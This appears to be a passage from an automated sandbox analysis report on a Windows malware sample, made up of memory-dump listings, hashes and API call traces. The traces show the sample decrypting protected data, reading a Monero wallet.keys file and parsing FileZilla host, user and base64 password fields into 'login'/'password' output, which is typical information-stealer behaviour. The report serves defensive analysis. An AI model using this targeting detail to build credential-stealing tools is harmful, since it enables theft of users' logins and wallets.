                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: ea71302b775b7cb7937bc432c18a5a6d42a2630cbaf6be8f6627633ba0833ec9
                  • Instruction ID: ccd9217b0debefe909030bb520046ba334565a64104ce0210b5aa42db7a5a706
                  • Opcode Fuzzy Hash: ea71302b775b7cb7937bc432c18a5a6d42a2630cbaf6be8f6627633ba0833ec9
                  • Instruction Fuzzy Hash: 63118EB1945228EFEB208F94DD49FA9BB7CFB44721F10479AE90A972C0DB746A40CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #Dif$:_V$=G[$f~}
                  • API String ID: 0-3080401173
                  • Opcode ID: 8f385e80e6ca75540ab7aa593cd569840db2e43e35df76c5d2777704abbcef9b
                  • Instruction ID: 62552cae61ee6dba1e2192805d95940c4f9901fcdf662e4e9c739d85467c1435
                  • Opcode Fuzzy Hash: 8f385e80e6ca75540ab7aa593cd569840db2e43e35df76c5d2777704abbcef9b
                  • Instruction Fuzzy Hash: 890239F360C2009FE308AE2DEC9567AFBE5EF94720F1A893DE6C5C7744E97598008656
                  APIs
                  • CoCreateInstance.COMBASE(009BE118,00000000,00000001,009BE108,00000000), ref: 009B3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009B37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 74870f4049422966abf5ad321e10f9b8430b129d676742b4400dd275094f0cca
                  • Instruction ID: ef5f2bb974dc3b180ddb08293ecb467e5682801f2bb910d0c2cfaa163fbbc652
                  • Opcode Fuzzy Hash: 74870f4049422966abf5ad321e10f9b8430b129d676742b4400dd275094f0cca
                  • Instruction Fuzzy Hash: 5841F870A40A289FDB24DB58CC94BDBB7B5BB48712F4091D8E608EB2D0D771AE85CF51
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 009A9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 009A9BA3
                  • LocalFree.KERNEL32(?), ref: 009A9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: c8a290a429c34aa7783cc5015f194ed77bdb72c0f6d6f1959a1383080a6400d4
                  • Instruction ID: b8299dfac1ca6832b6dd707afe87a48ac68fb3c651c043897cde445a3647ff6f
                  • Opcode Fuzzy Hash: c8a290a429c34aa7783cc5015f194ed77bdb72c0f6d6f1959a1383080a6400d4
                  • Instruction Fuzzy Hash: 0A11C9B8A00209EFDB04DF94D985AAEB7B9FF8D304F104598E915AB350D774AE50CFA1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b0d9bc97df6fc37cb128a3d21480eb639d32ed2ffcc04f5e8ca940f417bddef
                  • Instruction ID: f8de8e6bd55933fd0bb2eec09ea4c911b0bf2da2cd4ec9a3042b15c168d86ffd
                  • Opcode Fuzzy Hash: 2b0d9bc97df6fc37cb128a3d21480eb639d32ed2ffcc04f5e8ca940f417bddef
                  • Instruction Fuzzy Hash: 72C198F3A082049FE7105E2CEC847ABB7E5EF94754F1A453EEAC4D3784E9766C058286
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eeef595f966b4cd8d08afe5b2e45da83a2a9e1178fa003cc4a2c0e8dbda85ca7
                  • Instruction ID: 6b247b10a48c203b9c8a689f827464849702436e13c348492c91ee41aacfd7fd
                  • Opcode Fuzzy Hash: eeef595f966b4cd8d08afe5b2e45da83a2a9e1178fa003cc4a2c0e8dbda85ca7
                  • Instruction Fuzzy Hash: AB8126F3E083144BE3006E6DEC8436AFBD9EB94720F1B463DDE9893780E57A5D458686
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 330129fe6b01f8bd52121850f2759c9d7ada1082367ab3aa93a8757419f553a8
                  • Instruction ID: 639f766a02db16d718c35b03916fe1833979706a2e2647e05f3f69c92c90b1aa
                  • Opcode Fuzzy Hash: 330129fe6b01f8bd52121850f2759c9d7ada1082367ab3aa93a8757419f553a8
                  • Instruction Fuzzy Hash: 5951AEF3A282045BF708AE2CDD56777FBD5DB90320F1A463DEE89D3384E83959058285
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 675c6dbd281403c5bab80d03e0a4d61e9250d5be6402976e9e35dca7a2883698
                  • Instruction ID: ca76d6dddd628e36f84c4a29cb5f9024a0804d79bdf8a94cf85e0d88a0e116a1
                  • Opcode Fuzzy Hash: 675c6dbd281403c5bab80d03e0a4d61e9250d5be6402976e9e35dca7a2883698
                  • Instruction Fuzzy Hash: 57513AF391C6108BE3047E2DEC4666AFBE5EB94320F1A4A3DDAD5C7380FD3598548286
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8b91e3bb18efb5b8af14cafc30f4641966e92e1e471ff59e5c833e893b51d976
                  • Instruction ID: 0b40f7cb8a240d491c91cefdd3b5fcce1d55fbd0a15981ea6d1a0c951f7b6d0e
                  • Opcode Fuzzy Hash: 8b91e3bb18efb5b8af14cafc30f4641966e92e1e471ff59e5c833e893b51d976
                  • Instruction Fuzzy Hash: FD419FB3B082105FF314592DDC4976BB7DADBD4720F1A863DDA94C7B88DD79180182D5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b903d4a83b99cb128d033daabbc6842358701c43781c4ea1d2ccf93fc56005c1
                  • Instruction ID: 01773033b627b91837898bd19943a59a6563c5439e52b9f17395f1bd04f66979
                  • Opcode Fuzzy Hash: b903d4a83b99cb128d033daabbc6842358701c43781c4ea1d2ccf93fc56005c1
                  • Instruction Fuzzy Hash: D44123B3F082041BF308A93AED857767687DBD4320F6AC23EAB68977C4EC7D48060195
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 57695e62cc377643f831ee60b4701ed86a3059a599bc69e5359ce62e59913e75
                  • Instruction ID: 8f38269f19f26f8515e08b50d788f180c4dd4d72b5c7727746fb2c95f1b3231e
                  • Opcode Fuzzy Hash: 57695e62cc377643f831ee60b4701ed86a3059a599bc69e5359ce62e59913e75
                  • Instruction Fuzzy Hash: EC1148B140830ECFEB159F14C4083AE73A0FF11725F12492AE9D1459D1DB771D98DE8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,009C0DBA,009C0DB7,009C0DB6,009C0DB3), ref: 009B0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 009B0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 009B03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B03DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 009B0419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009B0463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B0532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009C0DB2), ref: 009B054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009B0562
                  • lstrcat.KERNEL32(?,profile: null), ref: 009B0571
                  • lstrcat.KERNEL32(?,url: ), ref: 009B0580
                  • lstrcat.KERNEL32(?,00000000), ref: 009B0593
                  • lstrcat.KERNEL32(?,009C1678), ref: 009B05A2
                  • lstrcat.KERNEL32(?,00000000), ref: 009B05B5
                  • lstrcat.KERNEL32(?,009C167C), ref: 009B05C4
                  • lstrcat.KERNEL32(?,login: ), ref: 009B05D3
                  • lstrcat.KERNEL32(?,00000000), ref: 009B05E6
                  • lstrcat.KERNEL32(?,009C1688), ref: 009B05F5
                  • lstrcat.KERNEL32(?,password: ), ref: 009B0604
                  • lstrcat.KERNEL32(?,00000000), ref: 009B0617
                  • lstrcat.KERNEL32(?,009C1698), ref: 009B0626
                  • lstrcat.KERNEL32(?,009C169C), ref: 009B0635
